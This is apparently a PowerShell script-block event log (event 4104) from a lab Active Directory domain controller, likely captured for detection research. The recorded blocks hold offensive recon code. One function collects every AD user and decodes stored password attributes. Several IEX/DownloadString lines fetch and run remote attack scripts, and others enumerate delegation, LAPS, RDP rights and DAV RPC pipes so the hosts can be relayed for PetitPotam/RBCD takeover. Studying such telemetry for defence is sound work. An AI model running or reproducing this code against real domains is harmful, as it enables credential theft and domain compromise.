4104132150x0131234Microsoft-Windows-PowerShell/Operationalwin-dc-bpatel-97839-727.attackrange.local11 Function thyme { [CmdletBinding()] Param() Write-Verbose "Getting list of domain accounts and properties..." $qOWFQWkJJyBAHQA = Get-AdUser -Filter * -Properties * | Select-Object samaccountname, description, UnixUserPassword, UserPassword, unicodePwd, msSFU30Name, msSFU30Password Write-Verbose "Decoding passwords for each account..." $WDXHnD9vwYsGpwZ = $qOWFQWkJJyBAHQA | ForEach-Object{ $9cSMwcpwwzrH99O = $_.samaccountname $rBMtxJeoGJA9Yhj = $_.description $bhmVADTWCNyQDBH = $_.UnixUserPassword | ForEach-Object {$_}; if($bhmVADTWCNyQDBH -notlike ""){ $nzzlIDaKM9vOLrt = [System.Text.Encoding]::ASCII.GetString($bhmVADTWCNyQDBH) }else{ $nzzlIDaKM9vOLrt = "" } $ZRSWg9WgXyKazVf = $_.UserPassword | ForEach-Object {$_}; if($ZRSWg9WgXyKazVf -notlike ""){ $DwmUahhxYUnMUDt = [System.Text.Encoding]::ASCII.GetString($ZRSWg9WgXyKazVf) }else{ $DwmUahhxYUnMUDt = "" } $OBybvX99wOAvlkZ = $_.unicodePwd | ForEach-Object {$_}; if($OBybvX99wOAvlkZ -notlike ""){ $y9pF9GQs9pQkpOJ = [System.Text.Encoding]::ASCII.GetString($OBybvX99wOAvlkZ) }else{ $y9pF9GQs9pQkpOJ = "" } $EUiMUEHJrJXautU = $_.msSFU30Name $JOQyEkZGOmgldPR = $_.msSFU30Password | ForEach-Object {$_}; if ($JOQyEkZGOmgldPR -notlike ""){ $fwQxQ9NxpGxJ9ZN = [System.Text.Encoding]::ASCII.GetString($JOQyEkZGOmgldPR) }else{ $fwQxQ9NxpGxJ9ZN = "" } if(($nzzlIDaKM9vOLrt) -or ($DwmUahhxYUnMUDt) -or ($fwQxQ9NxpGxJ9ZN) -or ($y9pF9GQs9pQkpOJ)){ $CavAHRzKsaosfJM = New-Object PSObject $CavAHRzKsaosfJM | add-member Noteproperty SamAccountName $9cSMwcpwwzrH99O $CavAHRzKsaosfJM | add-member Noteproperty Description $rBMtxJeoGJA9Yhj $CavAHRzKsaosfJM | add-member Noteproperty UnixUserPassword $nzzlIDaKM9vOLrt $CavAHRzKsaosfJM | add-member Noteproperty UserPassword $DwmUahhxYUnMUDt $CavAHRzKsaosfJM | add-member Noteproperty unicodePwd $y9pF9GQs9pQkpOJ $CavAHRzKsaosfJM | add-member Noteproperty msSFU30Name $EUiMUEHJrJXautU $CavAHRzKsaosfJM | add-member Noteproperty msSFU30Password $fwQxQ9NxpGxJ9ZN } $CavAHRzKsaosfJM } $WDXHnD9vwYsGpwZ | Sort-Object SamAccountName -Unique $uMHAowvnLDtltPM = $wNoLcmbD9sQ9FkA.Count write-verbose "Decoded passwords for $uMHAowvnLDtltPM domain accounts." } fcef06e9-89ea-4b8c-839f-584ec771cc0a 4104152150x0131124Microsoft-Windows-PowerShell/Operationalwin-dc-bpatel-97839-727.attackrange.local11function generaldomaininfo{ Param ( [Switch] $noninteractive, [Switch] $consoleoutput ) if(!$consoleoutput){pathcheck} $currentPath = (Get-Item -Path ".\" -Verbose).FullName #Search for AD-Passwords in description fields Write-Host -ForegroundColor Yellow '-------> Searching for passwords in active directory description fields..' iex ($admodule) iex (new-object net.webclient).downloadstring($S3cur3Th1sSh1t_repo + '/Creds/master/obfuscatedps/adpass.ps1') if(!$consoleoutput){thyme >> "$currentPath\DomainRecon\Passwords_in_description.txt"}else{Write-Host -ForegroundColor Yellow '-------> Passwords in description fields:';thyme} IEX (New-Object Net.WebClient).DownloadString($S3cur3Th1sSh1t_repo + '/Creds/master/obfuscatedps/view.ps1') $domain_Name = skulked $Domain = $domain_Name.Name Write-Host -ForegroundColor Yellow '-------> Starting Domain Recon phase:' Write-Host -ForegroundColor Yellow 'Creating Domain User-List:' Write-Host -ForegroundColor Yellow 'Searching for Exploitable Systems:' if(!$consoleoutput){inset >> "$currentPath\DomainRecon\ExploitableSystems.txt"}else{inset} #P0werview functions, string replaced version Write-Host -ForegroundColor Yellow '-------> All those PowerView Network Skripts for later Lookup getting executed and saved:' if(!$consoleoutput){ try{ skulked >> "$currentPath\DomainRecon\NetDomain.txt" televisions >> "$currentPath\DomainRecon\NetForest.txt" misdirects >> "$currentPath\DomainRecon\NetForestDomain.txt" odometer >> "$currentPath\DomainRecon\NetDomainController.txt" Houyhnhnm >> "$currentPath\DomainRecon\NetUser.txt" Randal >> "$currentPath\DomainRecon\NetSystems.txt" Get-Printer >> "$currentPath\DomainRecon\localPrinter.txt" damsels >> "$currentPath\DomainRecon\NetOU.txt" xylophone >> "$currentPath\DomainRecon\NetSite.txt" ignominies >> "$currentPath\DomainRecon\NetSubnet.txt" reapportioned >> "$currentPath\DomainRecon\NetGroup.txt" confessedly >> "$currentPath\DomainRecon\NetGroupMember.txt" aqueduct >> "$currentPath\DomainRecon\NetFileServer.txt" marinated >> "$currentPath\DomainRecon\DFSshare.txt" liberation >> "$currentPath\DomainRecon\NetShare.txt" cherubs >> "$currentPath\DomainRecon\NetLoggedon" Trojans >> "$currentPath\DomainRecon\Domaintrusts.txt" sequined >> "$currentPath\DomainRecon\ForestTrust.txt" ringer >> "$currentPath\DomainRecon\ForeignUser.txt" condor >> "$currentPath\DomainRecon\ForeignGroup.txt" }catch{Write-Host "Got an error"} } else { try{ Write-Host -ForegroundColor Yellow '-------> NetDomain' skulked Write-Host -ForegroundColor Yellow '-------> NetForest' televisions Write-Host -ForegroundColor Yellow '-------> NetForestDomain' misdirects Write-Host -ForegroundColor Yellow '-------> NetDomainController' odometer Write-Host -ForegroundColor Yellow '-------> NetUser' Houyhnhnm Write-Host -ForegroundColor Yellow '-------> NetSystems' Randal Write-Host -ForegroundColor Yellow '-------> LocalPrinter' Get-Printer Write-Host -ForegroundColor Yellow '-------> NetOU' damsels Write-Host -ForegroundColor Yellow '-------> NetSite' xylophone Write-Host -ForegroundColor Yellow '-------> NetSubnet' ignominies Write-Host -ForegroundColor Yellow '-------> NetGroup' reapportioned Write-Host -ForegroundColor Yellow '-------> NetGroupMember' confessedly Write-Host -ForegroundColor Yellow '-------> NetFileServer' aqueduct Write-Host -ForegroundColor Yellow '-------> DFSShare' marinated Write-Host -ForegroundColor Yellow '-------> NetShare' liberation Write-Host -ForegroundColor Yellow '-------> NetLoggedon' cherubs Write-Host -ForegroundColor Yellow '-------> DomainTrust' Trojans Write-Host -ForegroundColor Yellow '-------> ForestTrust' sequined Write-Host -ForegroundColor Yellow '-------> ForeigUser' ringer Write-Host -ForegroundColor Yellow '-------> ForeignGroup' condor }catch{Write-Host "Got an error"} } IEX ($viewdevobfs) if(!$consoleoutput){breviaries -Printers >> "$currentPath\DomainRecon\DomainPrinters.txt"}else{Write-Host -ForegroundColor Yellow "-------> DomainPrinters";breviaries -Printers} IEX(New-Object Net.WebClient).DownloadString($S3cur3Th1sSh1t_repo + '/Creds/master/PowershellScripts/SPN-Scan.ps1') if(!$consoleoutput){Discover-PSInterestingServices >> "$currentPath\DomainRecon\SPNScan_InterestingServices.txt"}else{Write-Host -ForegroundColor Yellow "-------> InterestingSPNs";Discover-PSInterestingServices} if(!$consoleoutput){Get-ADUser -Filter {UserAccountControl -band 0x0020} >> "$currentPath\Vulnerabilities\UsersWithoutPasswordPolicy.txt"}else{Write-Host -ForegroundColor Yellow '-------> Users without password policy:';Get-ADUser -Filter {UserAccountControl -band 0x0020}} # Dictionary to hold superclass names $superClass = @{} # List to hold class names that inherit from container and are allowed to live under computer object $vulnerableSchemas = [System.Collections.Generic.List[string]]::new() # Resolve schema naming context $schemaNC = (Get-ADRootDSE).schemaNamingContext # Enumerate all class schemas $classSchemas = Get-ADObject -LDAPFilter '(objectClass=classSchema)' -SearchBase $schemaNC -Properties lDAPDisplayName,subClassOf,possSuperiors # Enumerate all class schemas that computer is allowed to contain $computerInferiors = $classSchemas |Where-Object possSuperiors -eq 'computer' # Populate superclass table $classSchemas |ForEach-Object { $superClass[$_.lDAPDisplayName] = $_.subClassOf } # Resolve class inheritance for computer inferiors $computerInferiors |ForEach-Object { $class = $cursor = $_.lDAPDisplayName while($superClass[$cursor] -notin 'top'){ if($superClass[$cursor] -eq 'container'){ $vulnerableSchemas.Add($class) break } $cursor = $superClass[$cursor] } } # Outpupt list of vulnerable class schemas $vulnerableSchemas if(!$consoleoutput){$vulnerableSchemas >> "$currentPath\Vulnerabilities\VulnerableSchemas.txt"}else{Write-Host -ForegroundColor Yellow '-------> Found vulnerable old Exchange Schema (https://twitter.com/tiraniddo/status/1420754900984631308):';$vulnerableSchemas} Write-Host -ForegroundColor Yellow '-------> Searching for Users without password Change for a long time' $Date = (Get-Date).AddYears(-1).ToFileTime() if(!$consoleoutput){prostituted -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset >> "$currentPath\DomainRecon\Users_Nochangedpassword.txt"}else{prostituted -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset} if(!$consoleoutput){ prostituted -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users1.txt" prostituted -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users2.txt" } else { Write-Host -ForegroundColor Yellow '-------> Enabled Users' prostituted -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname } Write-Host -ForegroundColor Yellow '-------> Searching for Unconstrained delegation Systems and Users' if(!$consoleoutput){ $Computers = breviaries -Unconstrained -Properties DnsHostName >> "$currentPath\DomainRecon\Unconstrained_Delegation_Systems.txt" $Users = prostituted -AllowDelegation -AdminCount >> "$currentPath\DomainRecon\AllowDelegationUsers.txt" $Users.samaccountname >> "$currentPath\DomainRecon\AllowDelegationUsers_samaccountnames_only.txt" } else { Write-Host -ForegroundColor Yellow '-------> Unconstrained delegation Systems' $Computers = breviaries -Unconstrained -Properties DnsHostName Write-Host -ForegroundColor Yellow '-------> Unconstrained delegation Users' $Users = prostituted -AllowDelegation -AdminCount $Users.samaccountname } Write-Host -ForegroundColor Yellow '-------> Identify kerberos and password policy..' $DomainPolicy = forsakes -Policy Domain if(!$consoleoutput){ $DomainPolicy.KerberosPolicy >> "$currentPath\DomainRecon\Kerberospolicy.txt" $DomainPolicy.SystemAccess >> "$currentPath\DomainRecon\Passwordpolicy.txt" } else { $DomainPolicy.KerberosPolicy $DomainPolicy.SystemAccess } Write-Host -ForegroundColor Yellow '-------> Searching for LAPS Administrators' if(!$consoleoutput){lapschecks}else{lapschecks -noninteractive -consoleoutput} Write-Host -ForegroundColor Yellow '-------> Searching for Systems we have RDP access to..' if(!$consoleoutput){rewires -LocalGroup RDP -Identity $env:Username -domain $domain >> "$currentPath\DomainRecon\RDPAccess_Systems.txt"}else{rewires -LocalGroup RDP -Identity $env:Username -domain $domain} }7784da16-3553-4b0f-97e0-fa8266e78e46 4104132150x0131112Microsoft-Windows-PowerShell/Operationalwin-dc-bpatel-97839-727.attackrange.local1120Get-Item -Path ".\" -Verbose).FullName #Search for AD-Passwords in description fields Write-Host -ForegroundColor Yellow '-------> Searching for passwords in active directory description fields..' iex ($admodule) iex (new-object net.webclient).downloadstring($S3cur3Th1sSh1t_repo + '/Creds/master/obfuscatedps/adpass.ps1') if(!$consoleoutput){thyme >> "$currentPath\DomainRecon\Passwords_in_description.txt"}else{Write-Host -ForegroundColor Yellow '-------> Passwords in description fields:';thyme} IEX (New-Object Net.WebClient).DownloadString($S3cur3Th1sSh1t_repo + '/Creds/master/obfuscatedps/view.ps1') $domain_Name = skulked $Domain = $domain_Name.Name Write-Host -ForegroundColor Yellow '-------> Starting Domain Recon phase:' Write-Host -ForegroundColor Yellow 'Creating Domain User-List:' Write-Host -ForegroundColor Yellow 'Searching for Exploitable Systems:' if(!$consoleoutput){inset >> "$currentPath\DomainRecon\ExploitableSystems.txt"}else{inset} #P0werview functions, string replaced version Write-Host -ForegroundColor Yellow '-------> All those PowerView Network Skripts for later Lookup getting executed and saved:' if(!$consoleoutput){ try{ skulked >> "$currentPath\DomainRecon\NetDomain.txt" televisions >> "$currentPath\DomainRecon\NetForest.txt" misdirects >> "$currentPath\DomainRecon\NetForestDomain.txt" odometer >> "$currentPath\DomainRecon\NetDomainController.txt" Houyhnhnm >> "$currentPath\DomainRecon\NetUser.txt" Randal >> "$currentPath\DomainRecon\NetSystems.txt" Get-Printer >> "$currentPath\DomainRecon\localPrinter.txt" damsels >> "$currentPath\DomainRecon\NetOU.txt" xylophone >> "$currentPath\DomainRecon\NetSite.txt" ignominies >> "$currentPath\DomainRecon\NetSubnet.txt" reapportioned >> "$currentPath\DomainRecon\NetGroup.txt" confessedly >> "$currentPath\DomainRecon\NetGroupMember.txt" aqueduct >> "$currentPath\DomainRecon\NetFileServer.txt" marinated >> "$currentPath\DomainRecon\DFSshare.txt" liberation >> "$currentPath\DomainRecon\NetShare.txt" cherubs >> "$currentPath\DomainRecon\NetLoggedon" Trojans >> "$currentPath\DomainRecon\Domaintrusts.txt" sequined >> "$currentPath\DomainRecon\ForestTrust.txt" ringer >> "$currentPath\DomainRecon\ForeignUser.txt" condor >> "$currentPath\DomainRecon\ForeignGroup.txt" }catch{Write-Host "Got an error"} } else { try{ Write-Host -ForegroundColor Yellow '-------> NetDomain' skulked Write-Host -ForegroundColor Yellow '-------> NetForest' televisions Write-Host -ForegroundColor Yellow '-------> NetForestDomain' misdirects Write-Host -ForegroundColor Yellow '-------> NetDomainController' odometer Write-Host -ForegroundColor Yellow '-------> NetUser' Houyhnhnm Write-Host -ForegroundColor Yellow '-------> NetSystems' Randal Write-Host -ForegroundColor Yellow '-------> LocalPrinter' Get-Printer Write-Host -ForegroundColor Yellow '-------> NetOU' damsels Write-Host -ForegroundColor Yellow '-------> NetSite' xylophone Write-Host -ForegroundColor Yellow '-------> NetSubnet' ignominies Write-Host -ForegroundColor Yellow '-------> NetGroup' reapportioned Write-Host -ForegroundColor Yellow '-------> NetGroupMember' confessedly Write-Host -ForegroundColor Yellow '-------> NetFileServer' aqueduct Write-Host -ForegroundColor Yellow '-------> DFSShare' marinated Write-Host -ForegroundColor Yellow '-------> NetShare' liberation Write-Host -ForegroundColor Yellow '-------> NetLoggedon' cherubs Write-Host -ForegroundColor Yellow '-------> DomainTrust' Trojans Write-Host -ForegroundColor Yellow '-------> ForestTrust' sequined Write-Host -ForegroundColor Yellow '-------> ForeigUser' ringer Write-Host -ForegroundColor Yellow '-------> ForeignGroup' condor }catch{Write-Host "Got an error"} } IEX ($viewdevobfs) if(!$consoleoutput){breviaries -Printers >> "$currentPath\DomainRecon\DomainPrinters.txt"}else{Write-Host -ForegroundColor Yellow "-------> DomainPrinters";breviaries -Printers} IEX(New-Object Net.WebClient).DownloadString($S3cur3Th1sSh1t_repo + '/Creds/master/PowershellScripts/SPN-Scan.ps1') if(!$consoleoutput){Discover-PSInterestingServices >> "$currentPath\DomainRecon\SPNScan_InterestingServices.txt"}else{Write-Host -ForegroundColor Yellow "-------> InterestingSPNs";Discover-PSInterestingServices} if(!$consoleoutput){Get-ADUser -Filter {UserAccountControl -band 0x0020} >> "$currentPath\Vulnerabilities\UsersWithoutPasswordPolicy.txt"}else{Write-Host -ForegroundColor Yellow '-------> Users without password policy:';Get-ADUser -Filter {UserAccountControl -band 0x0020}} # Dictionary to hold superclass names $superClass = @{} # List to hold class names that inherit from container and are allowed to live under computer object $vulnerableSchemas = [System.Collections.Generic.List[string]]::new() # Resolve schema naming context $schemaNC = (Get-ADRootDSE).schemaNamingContext # Enumerate all class schemas $classSchemas = Get-ADObject -LDAPFilter '(objectClass=classSchema)' -SearchBase $schemaNC -Properties lDAPDisplayName,subClassOf,possSuperiors # Enumerate all class schemas that computer is allowed to contain $computerInferiors = $classSchemas |Where-Object possSuperiors -eq 'computer' # Populate superclass table $classSchemas |ForEach-Object { $superClass[$_.lDAPDisplayName] = $_.subClassOf } # Resolve class inheritance for computer inferiors $computerInferiors |ForEach-Object { $class = $cursor = $_.lDAPDisplayName while($superClass[$cursor] -notin 'top'){ if($superClass[$cursor] -eq 'container'){ $vulnerableSchemas.Add($class) break } $cursor = $superClass[$cursor] } } # Outpupt list of vulnerable class schemas $vulnerableSchemas if(!$consoleoutput){$vulnerableSchemas >> "$currentPath\Vulnerabilities\VulnerableSchemas.txt"}else{Write-Host -ForegroundColor Yellow '-------> Found vulnerable old Exchange Schema (https://twitter.com/tiraniddo/status/1420754900984631308):';$vulnerableSchemas} Write-Host -ForegroundColor Yellow '-------> Searching for Users without password Change for a long time' $Date = (Get-Date).AddYears(-1).ToFileTime() if(!$consoleoutput){prostituted -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset >> "$currentPath\DomainRecon\Users_Nochangedpassword.txt"}else{prostituted -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset} if(!$consoleoutput){ prostituted -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users1.txt" prostituted -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users2.txt" } else { Write-Host -ForegroundColor Yellow '-------> Enabled Users' prostituted -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname } Write-Host -ForegroundColor Yellow '-------> Searching for Unconstrained delegation Systems and Users' if(!$consoleoutput){ $Computers = breviaries -Unconstrained -Properties DnsHostName >> "$currentPath\DomainRecon\Unconstrained_Delegation_Systems.txt" $Users = prostituted -AllowDelegation -AdminCount >> "$currentPath\DomainRecon\AllowDelegationUsers.txt" $Users.samaccountname >> "$currentPath\DomainRecon\AllowDelegationUsers_samaccountnames_only.txt" } else { Write-Host -ForegroundColor Yellow '-------> Unconstrained delegation Systems' $Computers = breviaries -Unconstrained -Properties DnsHostName Write-Host -ForegroundColor Yellow '-------> Unconstrained delegation Users' $Users = prostituted -AllowDelegation -AdminCount $Users.samaccountname } Write-Host -ForegroundColor Yellow '-------> Identify kerberos and password policy..' $DomainPolicy = forsakes -Policy Domain if(!$consoleoutput){ $DomainPolicy.KerberosPolicy >> "$currentPath\DomainRecon\Kerberospolicy.txt" $DomainPolicy.SystemAccess >> "$currentPath\DomainRecon\Passwordpolicy.txt" } else { $DomainPolicy.KerberosPolicy $DomainPolicy.SystemAccess } Write-Host -ForegroundColor Yellow '-------> Searching for LAPS Administrators' if(!$consoleoutput){lapschecks}else{lapschecks -noninteractive -consoleoutput} Write-Host -ForegroundColor Yellow '-------> Searching for Systems we have RDP access to..' if(!$consoleoutput){rewires -LocalGroup RDP -Identity $env:Username -domain $domain >> "$currentPath\DomainRecon\RDPAccess_Systems.txt"}else{rewires -LocalGroup RDP -Identity $env:Username -domain $domain} } function Invoke-RBDC-over-DAVRPC { <# .DESCRIPTION Search in AD for pingable Windows servers and Check if they are vulnerable to RBCD via Petitpotam + relay to ldap. https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb Author: @S3cur3Th1sSh1t License: BSD 3-Clause #> #Domain Recon [CmdletBinding()] Param ( [Switch] $noninteractive, [Switch] $consoleoutput ) if(!$consoleoutput){pathcheck} $currentPath = (Get-Item -Path ".\" -Verbose).FullName IEX ($viewdevobfs) $serversystems = "yes" if(!$noninteractive) { $serversystems = Read-Host -Prompt 'Start DAV RPC Scan for Windows Servers only (alternatively we can scan all Servers + Clients but this can take a while)? (yes/no)' } if ($serversystems -eq "yes" -or $serversystems -eq "y" -or $serversystems -eq "Yes" -or $serversystems -eq "Y") { if(Test-Path -Path "$currentPath\DomainRecon\Windows_Servers.txt") { Write-Host -ForegroundColor Yellow "Found an existing Server list, using this one instead of generating a new one!" $ActiveServers = Get-Content "$currentPath\DomainRecon\Windows_Servers.txt" } else { Write-Host -ForegroundColor Yellow 'Searching for active Servers in the domain, this can take a while depending on the domain size' $ActiveServers = breviaries -Ping -OperatingSystem "Windows Server*" $ActiveServers = $ActiveServers.dnshostname if(!$consoleoutput){$ActiveServers >> "$currentPath\DomainRecon\Windows_Servers.txt"} } foreach ($acserver in $ActiveServers) { try{ $path = "" $path = Get-ChildItem -Path "\\$acserver\pipe\DAV RPC SERVICE" if (!($path -eq $null)) { Write-Host -ForegroundColor Yellow "Found vulnerable Server - " + $acserver + ". If no LDAP Signing is enforced (default config) you can pwn via https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb!" 539376b5-df59-4eb3-a515-f3baeb693298 4104152150x0118234Microsoft-Windows-PowerShell/Operationalwin-dc-bpatel-97839-727.attackrange.local11{net user /domain get-localgroupmember -group Users get-aduser -filter *}8af983db-73fc-49a5-bd4e-34ceffd93fa9 4104152150x0118232Microsoft-Windows-PowerShell/Operationalwin-dc-bpatel-97839-727.attackrange.local11& {net user /domain get-localgroupmember -group Users get-aduser -filter *}d7f80551-76c8-4156-8960-76d94e6acc30